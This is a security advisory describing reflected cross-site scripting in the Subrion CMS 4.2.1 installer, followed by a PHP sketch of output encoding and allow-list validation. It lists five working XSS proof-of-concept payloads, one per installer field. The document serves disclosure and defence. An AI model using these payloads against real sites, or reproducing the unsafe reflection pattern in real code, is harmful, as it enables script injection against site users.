Description: Multiple Cross-Site Scripting (XSS) vulnerabilities in the installation process of Subrion CMS v.4.2.1 allow a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail fields.
Attack Vectors: Insufficient input sanitization in the installation process for the dbhost, dbname, dbuser, adminusername and adminemail fields allows JavaScript code to be injected.
During the installation process, we enter the XSS payload in any of the 5 fields and, when we click on next, we obtain the XSS pop-up:
'"><svg/onload=alert('dbhost')>
'"><svg/onload=alert('dbname')>
'"><svg/onload=alert('dbuser')>
'"><svg/onload=alert('adminusername')>
'"><svg/onload=alert('adminemail')>
In the following image you can see the embedded code that executes the payload in the installation process.
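Mitigation sketch, added here and not taken from Subrion's code base: an installer step that validates the five fields against allow-lists and HTML-encodes every value it reflects back into the form. The function names, the validation patterns and the assumption that the value is reflected inside a quoted `value` attribute are hypothetical; only the field names and the sample payload come from this advisory.

```php
<?php
/** Encode a value for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern: the submitted value is reflected without encoding. */
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

/** Hardened pattern: encode on output, regardless of earlier validation. */
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . e($name) . '" value="' . e($value) . '">';
}

/** Allow-list validation (assumed patterns); returns the rejected field names. */
function validate_install_input(array $post): array
{
    $rules = [
        'dbhost'        => '/\A[A-Za-z0-9.\-:]{1,255}\z/',
        'dbname'        => '/\A[A-Za-z0-9_]{1,64}\z/',
        'dbuser'        => '/\A[A-Za-z0-9_.\-]{1,32}\z/',
        'adminusername' => '/\A[A-Za-z0-9_.\-]{1,32}\z/',
        'adminemail'    => null, // checked with FILTER_VALIDATE_EMAIL instead
    ];
    $rejected = [];
    foreach ($rules as $field => $pattern) {
        // Non-string input (e.g. an array parameter) is treated as empty and rejected.
        $value = is_string($post[$field] ?? null) ? $post[$field] : '';
        $ok = $pattern === null
            ? filter_var($value, FILTER_VALIDATE_EMAIL) !== false
            : preg_match($pattern, $value) === 1;
        if (!$ok) { $rejected[] = $field; }
    }
    return $rejected;
}

// Constructed request data; dbhost carries the payload listed in this advisory.
$post = ['dbhost' => '\'"><svg/onload=alert(\'dbhost\')>', 'dbname' => 'subrion',
         'dbuser' => 'cms', 'adminusername' => 'admin', 'adminemail' => 'admin@example.test'];
echo render_field_unsafe('dbhost', $post['dbhost']), PHP_EOL; // raw reflection
echo render_field_safe('dbhost', $post['dbhost']), PHP_EOL;   // encoded reflection
echo 'rejected: ', implode(',', validate_install_input($post)), PHP_EOL;
```

Validation alone is not the fix: the output encoding in `render_field_safe` is what keeps a rejected value inert when the form is re-displayed with an error message.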